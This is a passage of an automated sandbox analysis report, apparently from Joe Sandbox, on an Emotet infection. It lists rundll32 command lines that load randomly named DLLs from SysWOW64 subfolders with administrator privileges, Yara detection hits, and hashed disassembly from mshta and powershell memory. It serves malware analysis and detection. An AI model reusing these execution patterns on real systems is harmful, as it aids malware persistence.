                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523491147.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523130788.0000000000140000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523994055.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.524063481.0000000003151000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523320512.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:21:05:07
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupAr
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.526646791.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.526815635.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:21:05:13
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServer
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.578128416.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.577400839.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.577595095.0000000000411000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.577894458.0000000000AD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.577987476.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.577837506.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.578250004.0000000002FC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.577793052.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.577428378.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.577866677.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.577472790.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.578315852.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.578085930.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.578205625.0000000002F50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.578029021.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:14
                                                                                                                                  Start time:21:05:34
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGhe
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.580780340.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.581619652.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.580991991.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                  General

                                                                                                                                  Target ID:15
                                                                                                                                  Start time:21:05:38
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServer
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646503314.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646421210.0000000000C41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646662898.0000000002F91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.645935439.0000000000140000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646563852.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646381329.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.645964256.0000000000181000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646120317.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646698678.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646029506.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646064656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646641702.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646764610.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646533313.00000000025F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.645994754.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646245001.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.646590734.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                  General

                                                                                                                                  Target ID:16
                                                                                                                                  Start time:21:05:58
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVh
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.649782159.0000000000211000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.650185514.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.649670122.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                  General

                                                                                                                                  Target ID:17
                                                                                                                                  Start time:21:06:11
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServer
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.674984852.0000000000761000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675100735.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.674911093.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675173904.0000000000821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675036629.00000000007C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675503420.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675011000.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                  Disassembly

                                                                                                                                  Reset < >

                                                                                                                                    Executed Functions

                                                                                                                                    Function 02921CE3 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418851392.0000000002920000.00000010.00000800.00020000.00000000.sdmp, Offset: 02921000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2920000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 88
                                                                                                                                    • API String ID: 0-1845789810
                                                                                                                                    • Opcode ID: 10b8dfdc2f73abb514f2d7ddda6d37af5747ff5baf0ecddbed0ad67dd86991d8
                                                                                                                                    • Instruction ID: 03195254dd1fb841f166d406578cfad5c2a7eeea5229816f4ccc4ea2cdb0ecfa
                                                                                                                                    • Opcode Fuzzy Hash: 10b8dfdc2f73abb514f2d7ddda6d37af5747ff5baf0ecddbed0ad67dd86991d8
                                                                                                                                    • Instruction Fuzzy Hash: 7CD12630A1CA984FDB5ADB2C8454724BBE1FF59344F1444AEE88ECB29BDA20CC95C795
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02921CE3 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418851392.0000000002920000.00000010.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2920000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 88
                                                                                                                                    • API String ID: 0-1845789810
                                                                                                                                    • Opcode ID: 10b8dfdc2f73abb514f2d7ddda6d37af5747ff5baf0ecddbed0ad67dd86991d8
                                                                                                                                    • Instruction ID: 03195254dd1fb841f166d406578cfad5c2a7eeea5229816f4ccc4ea2cdb0ecfa
                                                                                                                                    • Opcode Fuzzy Hash: 10b8dfdc2f73abb514f2d7ddda6d37af5747ff5baf0ecddbed0ad67dd86991d8
                                                                                                                                    • Instruction Fuzzy Hash: 7CD12630A1CA984FDB5ADB2C8454724BBE1FF59344F1444AEE88ECB29BDA20CC95C795
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02370F21 Relevance: .0, Instructions: 5COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418909077.0000000002370000.00000010.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2370000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction ID: 3c2708f39e08455c05ead4d5a7d95bb5e775b35bc7c749f35cfe8b6800a26e86
                                                                                                                                    • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02370F11 Relevance: .0, Instructions: 5COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418909077.0000000002370000.00000010.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2370000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction ID: 3c2708f39e08455c05ead4d5a7d95bb5e775b35bc7c749f35cfe8b6800a26e86
                                                                                                                                    • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02370F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418909077.0000000002370000.00000010.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2370000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction ID: 3c2708f39e08455c05ead4d5a7d95bb5e775b35bc7c749f35cfe8b6800a26e86
                                                                                                                                    • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02370F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418909077.0000000002370000.00000010.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2370000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction ID: 3c2708f39e08455c05ead4d5a7d95bb5e775b35bc7c749f35cfe8b6800a26e86
                                                                                                                                    • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02370F61 Relevance: .0, Instructions: 5COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418909077.0000000002370000.00000010.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2370000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction ID: 3c2708f39e08455c05ead4d5a7d95bb5e775b35bc7c749f35cfe8b6800a26e86
                                                                                                                                    • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02370F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418909077.0000000002370000.00000010.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2370000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction ID: 3c2708f39e08455c05ead4d5a7d95bb5e775b35bc7c749f35cfe8b6800a26e86
                                                                                                                                    • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02370F41 Relevance: .0, Instructions: 5COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418909077.0000000002370000.00000010.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2370000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction ID: 3c2708f39e08455c05ead4d5a7d95bb5e775b35bc7c749f35cfe8b6800a26e86
                                                                                                                                    • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02370F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418909077.0000000002370000.00000010.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2370000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction ID: 3c2708f39e08455c05ead4d5a7d95bb5e775b35bc7c749f35cfe8b6800a26e86
                                                                                                                                    • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02370F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418909077.0000000002370000.00000010.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2370000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction ID: 3c2708f39e08455c05ead4d5a7d95bb5e775b35bc7c749f35cfe8b6800a26e86
                                                                                                                                    • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02370FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418909077.0000000002370000.00000010.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2370000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction ID: 3c2708f39e08455c05ead4d5a7d95bb5e775b35bc7c749f35cfe8b6800a26e86
                                                                                                                                    • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Executed Functions

                                                                                                                                    Function 000007FF00280B62 Relevance: .2, Instructions: 180COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.683510378.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ff00280000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3cff74b75f742daab288f8833116792d000d6f71c040ac526a43e851a5e64472
                                                                                                                                    • Instruction ID: 2f8ae2075e97e8dafea24fdca19be1a80b3c874c39f2d80712adcd5a6cef66b2
                                                                                                                                    • Opcode Fuzzy Hash: 3cff74b75f742daab288f8833116792d000d6f71c040ac526a43e851a5e64472
                                                                                                                                    • Instruction Fuzzy Hash: 0341AD2060EBC60FE7535778586A7A07FB0EF17210F0A00EBD488CB0A3D9589959C362
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 000007FF002808A5 Relevance: .2, Instructions: 169COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.683510378.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ff00280000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0ab8388bb993b8766c573e1941374b7d73584e8dfee874aca440d1715006f1a5
                                                                                                                                    • Instruction ID: 21f5ba7f091968acb905ef9720406babec241dae963acc0e05542efea46b61a1
